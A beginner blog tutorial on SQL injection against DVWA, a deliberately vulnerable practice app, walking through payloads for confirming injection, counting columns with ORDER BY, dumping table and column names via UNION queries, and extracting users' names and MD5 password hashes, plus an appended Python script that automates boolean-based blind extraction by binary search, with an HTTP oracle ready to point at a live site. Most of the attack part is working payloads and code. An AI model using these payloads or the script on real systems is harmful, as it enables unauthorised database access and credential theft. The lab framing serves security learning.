Performing Boolean-based Blind SQL Injection on DVWA Environment (Beginners).

Lavish Garg
4 min read · Dec 31, 2020

Boolean-based blind SQL injection is a technique that relies on sending SQL conditions to the database through the vulnerable input and watching how the application responds. Depending on whether the injected condition evaluates to TRUE or FALSE, the content of the HTTP response either changes or stays the same. That difference lets an attacker tell whether a payload returned true or false even though no data from the database is displayed directly. It is a slow attack, since each request leaks at most one bit of information, but it is enough to enumerate the database one condition at a time. Reference: https://beaglesecurity.com/blog/vulnerability/boolean-based-blind-sql-injection.html

Here we will walk through the attack in the DVWA environment to better understand Boolean-based blind SQL injection.

Practical

  1. If you are starting out for the first time: after logging into DVWA, go to the DVWA Security tab. The security level is set to Impossible by default; change it to Low and submit.
  2. You might face some problems performing blind SQL injection in the blind tab of DVWA (2020 release), so we perform the same method in the SQL Injection tab instead.
  3. Now select the SQL Injection tab, where you can see the environment shown in the picture below.

4. Instead of putting the payload in the URL, we will enter all of our payloads in the User ID field.

5. Now we check whether blind SQL injection is possible. Enter the payload “1' and 1=1#” (1=1 is always true, so the query stays balanced and should still return the row for ID 1). To confirm the field is really injectable, also try “1' and 1=2#”, which should return nothing. If the field is not injectable, the true payload will not show any result either.

6. The image above shows that blind SQL injection is possible: the payload was injected and the row for ID 1 is still displayed.

7. Next we find the number of columns returned by the vulnerable query (the UNION payloads later on must select exactly that many values).

8. To check the number of columns we use the payload “1' and 1=1 order by 3#”.

9. If it throws an error, the query returns fewer than 3 columns, so we decrease the number one by one until we get output. Here the query returns two columns, which is why every UNION payload below selects exactly two values.

Error: a third column is not available, so the query returns fewer than 3 columns.
Query with “order by 2” is successfully injected.

10. Now we use the payload “' or 1=1 -- ” (MySQL requires a space after the two dashes for the comment to work; “#” can be used instead).

11. This lists every user, because the WHERE clause is now true for every row.

12. Now we list all tables in the database using the payload “1' and 1=0 union select null, table_name from information_schema.tables#”. The 1=0 makes the original condition false, so only the rows from the UNION are displayed. Note that from this step on the technique is really UNION-based injection, which works because DVWA's Low level echoes the query results; in a truly blind scenario this data would have to be inferred one true/false condition at a time.

13. Now we list the columns of the users table with the payload “1' and 1=0 union select null, column_name from information_schema.columns where table_name='users'#”.

14. Now we get the table name and the column names of users together in one result.

15. For that we use the payload “1' and 1=0 union select null, concat(table_name, 0x0a, column_name) from information_schema.columns where table_name='users'#” (0x0a is a newline, so the two values appear on separate lines).

16. From the image above we can see that first_name and password are the information we need, so we fetch them with the payload “1' and 1=0 union select null, concat(first_name, 0x0a, password) from users#”.

17. BOOM!!!! We got every user's first name and password. The passwords are not encrypted but hashed with unsalted MD5, so they can usually be recovered by looking the hashes up in an online MD5 database or cracking them against a wordlist.
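The procedure above, as an added example that is not part of the original article: a small Python script that automates the truly blind (boolean-based) version of steps 5 to 9 and then recovers a password hash one character at a time, instead of relying on the UNION echo. It assumes DVWA's Low-level query has the shape `SELECT first_name, last_name FROM users WHERE user_id = '$id'` with the id pasted in unescaped, and simulates that query with SQLite so it runs offline on constructed sample rows; the HTTP oracle, the `/vulnerabilities/sqli/` path and the cookie names for a live DVWA are also assumptions and are not exercised here.

```python
"""Boolean-based blind extraction against a DVWA-style query (added example).

Assumed vulnerable query (not quoted on the page):
    SELECT first_name, last_name FROM users WHERE user_id = '$id'
It is simulated with sqlite3 so the script runs offline.
"""
import sqlite3
import string
import urllib.parse
import urllib.request

# Constructed sample rows; hashes are md5('password') and md5('abc123').
SAMPLE_USERS = [
    (1, "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
]


def make_local_oracle():
    """Return oracle(id) -> True if the vulnerable query would display at least one row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)

    def oracle(user_id):
        sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
        try:
            return len(conn.execute(sql).fetchall()) > 0
        except sqlite3.Error:
            return False  # a broken query shows no rows, just like the DVWA page
    return oracle


def make_dvwa_oracle(base_url, phpsessid):
    """HTTP oracle for a live DVWA instance (assumed URL layout and cookies; not run here).
    DVWA's Low page prints 'First name:' for every row the query returns."""
    def oracle(user_id):
        qs = urllib.parse.urlencode({"id": user_id, "Submit": "Submit"})
        req = urllib.request.Request(
            f"{base_url}/vulnerabilities/sqli/?{qs}",
            headers={"Cookie": f"PHPSESSID={phpsessid}; security=low"},
        )
        with urllib.request.urlopen(req, timeout=10) as resp:
            return b"First name:" in resp.read()
    return oracle


# '-- ' (with the trailing space) is a comment in both MySQL and SQLite; DVWA's MySQL also takes '#'.
def is_injectable(oracle):
    """Steps 5-6: a true condition keeps the row for id 1, a false one must drop it."""
    return oracle("1' AND 1=1-- ") and not oracle("1' AND 1=2-- ")


def count_columns(oracle, max_cols=16):
    """Steps 7-9: ORDER BY n errors out (so no rows) once n exceeds the column count."""
    for n in range(1, max_cols + 1):
        if not oracle(f"1' ORDER BY {n}-- "):
            return n - 1
    return max_cols


def blind_length(oracle, subquery, max_len=64):
    """Length of the scalar subquery's result; returns None if it is NULL or too long."""
    for n in range(1, max_len + 1):
        if oracle(f"1' AND length(({subquery}))={n}-- "):
            return n
    return None


def blind_char(oracle, subquery, pos, charset):
    """Binary-search one character: ~log2(len(charset)) requests instead of one per candidate.
    charset must be sorted in the server's collation order (lowercase hex is safe on MySQL's
    case-insensitive default collation; use BINARY comparisons for mixed-case data)."""
    lo, hi = 0, len(charset) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"1' AND substr(({subquery}),{pos},1) > '{charset[mid]}'-- "):
            lo = mid + 1
        else:
            hi = mid
    return charset[lo]


def blind_extract(oracle, subquery, charset=string.digits + string.ascii_lowercase):
    """Recover the full string returned by a scalar subquery, character by character."""
    n = blind_length(oracle, subquery)
    if n is None:
        return None
    return "".join(blind_char(oracle, subquery, i, charset) for i in range(1, n + 1))


if __name__ == "__main__":
    oracle = make_local_oracle()  # swap for make_dvwa_oracle("http://localhost/dvwa", "<PHPSESSID>")
    print("injectable:", is_injectable(oracle))
    print("columns:", count_columns(oracle))
    print("admin hash:", blind_extract(oracle, "SELECT password FROM users WHERE user_id=1"))
```

Swap make_local_oracle() for make_dvwa_oracle(...) to run it against a lab instance. Each character costs about six requests with a 36-character alphabet, which is why the article's UNION payloads are so much faster when the page echoes results; the binary search is what keeps blind extraction practical when it does not.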

Thank You


Lavish Garg

I write articles related to Cyber Security and Blockchain.